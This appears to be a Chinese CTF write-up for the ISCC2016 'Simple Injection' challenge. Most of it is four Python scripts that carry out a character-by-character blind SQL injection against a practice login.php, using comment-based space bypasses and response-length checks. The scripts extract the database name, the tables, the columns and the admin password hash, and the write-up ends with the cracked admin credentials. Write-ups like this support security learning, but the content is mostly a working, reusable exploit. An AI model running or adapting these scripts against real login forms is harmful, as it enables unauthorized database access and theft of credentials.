sql盲注脚本(ISCC2016)Simple Injection

爆数据库

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation #数字+大小写字母
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr(database(),{0},1))={1}#"    #注入命令

st = 0
for i in range(1,50):  #i为库名长度
    st = 0
    for c in s :
        asc = ord(c)   #转为ASCII值
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :   #返回长度，可通过添加print(len(response.text))计算
            result += c
            print('database: ', result)
            st = 1
    if st == 0:
        break
print('database: ', result)

database=injection

爆表名

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#"

st = 0
for i in range(1,50):
    st = 0
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :
            result += c
            print('tables: ', result)
            st = 1
    if st == 0:
        break
print('tables: ', result)

tables: admin

爆列名

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='admin'),{0},1))={1}#"

st = 0
for i in range(1,50):
    st = 0
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :
            result += c
            print('columns: ', result)
            st = 1
    if st == 0:
        break
print('columns: ', result)

columns: id,username,password

爆值

import string
import requests

url = 'http://web.jarvisoj.com:32787/login.php'
s = string.digits + string.ascii_letters + string.punctuation 
payload = {
    'username' : '',
    'password' : 1
}
result = ''

username_template = "'or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))={1}#"

st = 0
for i in range(1,50):
    st = 0
    for c in s :
        asc = ord(c)
        payload['username'] = username_template.format(i,asc)
        response = requests.post(url, data=payload)
        if len(response.text) < 1192 :
            result += c
            print('password: ', result)
            st = 1
    if st == 0:
        break
print('password: ', result)

password: 334cfb59c9d74849801d5acdcfdaadc3

MD5解密后得到的提交

username=admin&password=eTAloCrEP